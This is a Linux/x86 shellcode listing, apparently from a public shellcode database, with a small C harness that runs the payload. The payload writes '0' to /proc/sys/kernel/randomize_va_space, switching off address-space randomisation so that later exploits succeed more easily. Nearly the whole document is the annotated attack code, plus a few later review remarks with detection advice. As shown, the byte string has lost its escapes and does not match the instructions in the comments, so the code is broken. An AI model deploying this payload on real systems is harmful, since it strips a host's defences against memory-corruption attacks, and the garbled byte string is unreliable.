# Title : Linux/x86 - Disable randomize stack addresse - 106 bytes
# Published : 2010-05-25
# Author : Jonathan Salwan
/*
Title: Linux/x86 - Disable randomize stack addresse - 106 bytes
(Set randomize_va_space to zero)
Author: Jonathan Salwan <submit (!) shell-storm.org>
Web: http://www.shell-storm.org
Twitter: http://twitter.com/shell_storm
!Database of Shellcodes http://www.shell-storm.org/shellcode/
Date: 2010-05-25
Tested: Linux 2.6.33 - i686
! You need root euid
*/
#include <stdio.h>
#include <string.h>
/*
 * sc: annotated Linux/x86 (32-bit, int $0x80 syscall ABI) payload.
 *
 * What the commented instruction sequence does:
 *   1. An initial syscall with al = 10 (unlink on i386) on the path "a";
 *      its purpose is not evident from this listing.
 *   2. Builds the path /proc/sys/kernel/randomize_va_space on the stack,
 *      four bytes at a time, last chunk first.
 *   3. open(path, O_WRONLY|O_CREAT|O_APPEND, 0644), then write(fd, "0" + newline, 2).
 *   4. exit.
 *
 * Effect: the kernel.randomize_va_space sysctl is set to 0. That switch
 * governs address-space randomisation as a whole (not only the stack, despite
 * the title) for programs executed afterwards. The page header states that an
 * effective UID of root is required.
 *
 * Defensive relevance: a hardened host should keep this sysctl at its
 * baseline (2 on current distributions). Treat any drop to 0, or any
 * unexpected write to this /proc/sys entry, as an alert condition, and have
 * configuration management re-assert the expected value.
 *
 * NOTE(review): as printed, the string literals carry no byte escapes, so the
 * array does not hold the machine code named in the comments. The comments
 * document the intended instruction sequence.
 */
char sc[] = "x31xdb" // xor %ebx,%ebx          ; ebx = 0
"x6ax61" // push $0x61             ; pushes the byte "a" followed by three zero bytes
"x89xe3" // mov %esp,%ebx          ; ebx -> that one-character string
"xb0x0a" // mov $0xa,%al           ; al = 10 (unlink on i386); upper bytes of eax are not cleared here
"xcdx80" // int $0x80              ; syscall - presumably unlink("a"); TODO confirm intent
"x31xdb" // xor %ebx,%ebx          ; ebx = 0
"x6ax65" // push $0x65             ; "e" plus zero bytes: end of the path and its terminator
"x66x68x61x63" // pushw $0x6361    ; "ac"
"x68x61x5fx73x70" // push $0x70735f61 ; "a_sp"
"x68x7ax65x5fx76" // push $0x765f657a ; "ze_v"
"x68x64x6fx6dx69" // push $0x696d6f64 ; "domi"
"x68x2fx72x61x6e" // push $0x6e61722f ; "/ran"
"x68x72x6ex65x6c" // push $0x6c656e72 ; "rnel"
"x68x73x2fx6bx65" // push $0x656b2f73 ; "s/ke"
"x68x63x2fx73x79" // push $0x79732f63 ; "c/sy"
"x68x2fx70x72x6f" // push $0x6f72702f ; "/pro"
"x89xe3" // mov %esp,%ebx          ; ebx -> "/proc/sys/kernel/randomize_va_space"
"x30xc0" // xor %al,%al            ; al = 0
"xb0x11" // mov $0x11,%al          ; al = 0x11; overwritten by the later mov $0x5,%al before any syscall, so no effect
"x31xc9" // xor %ecx,%ecx          ; ecx = 0
"x66xb9x41x04" // mov $0x441,%cx   ; flags = O_WRONLY|O_CREAT|O_APPEND (Linux/x86 values)
"x31xd2" // xor %edx,%edx          ; edx = 0
"x66xbaxa4x01" // mov $0x1a4,%dx   ; mode = 0644 (only consulted if the file were created)
"x31xc0" // xor %eax,%eax          ; eax = 0
"xb0x05" // mov $0x5,%al           ; eax = 5 (open)
"xcdx80" // int $0x80              ; open(path, flags, mode)
"x89xc3" // mov %eax,%ebx          ; ebx = returned fd; the result is not checked for an error
"x31xc9" // xor %ecx,%ecx          ; ecx = 0
"x66x68x30x0a" // pushw $0xa30     ; the two bytes "0" and newline
"x89xe1" // mov %esp,%ecx          ; ecx -> those two bytes
"x31xd2" // xor %edx,%edx          ; edx = 0
"xb2x02" // mov $0x2,%dl           ; edx = 2 (byte count)
"x31xc0" // xor %eax,%eax          ; eax = 0
"xb0x04" // mov $0x4,%al           ; eax = 4 (write)
"xcdx80" // int $0x80              ; write(fd, buf, 2)
"xb0x01" // mov $0x1,%al           ; al = 1 (exit); the rest of eax still holds write's return value
"xcdx80"; // int $0x80             ; exit; ebx still holds the fd, which becomes the status
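/*
 * Test harness: prints the length of sc, then calls the array as a function.
 *
 * strlen() returns size_t, so the length is printed with %zu. The original
 * "%d" did not match the argument type, which is undefined behaviour, and
 * the line terminator in the format string had lost its escape.
 *
 * NOTE(review): sc is an ordinary initialised data array. Transferring
 * control into it only works where data memory is executable; with
 * non-executable data pages (NX/DEP) the call faults instead of running.
 * Converting an object pointer to a function pointer is also outside what
 * ISO C defines.
 */
int main(void)
{
    fprintf(stdout, "Length: %zu\n", strlen(sc));
    (*(void (*)())sc)();
    return 0;
}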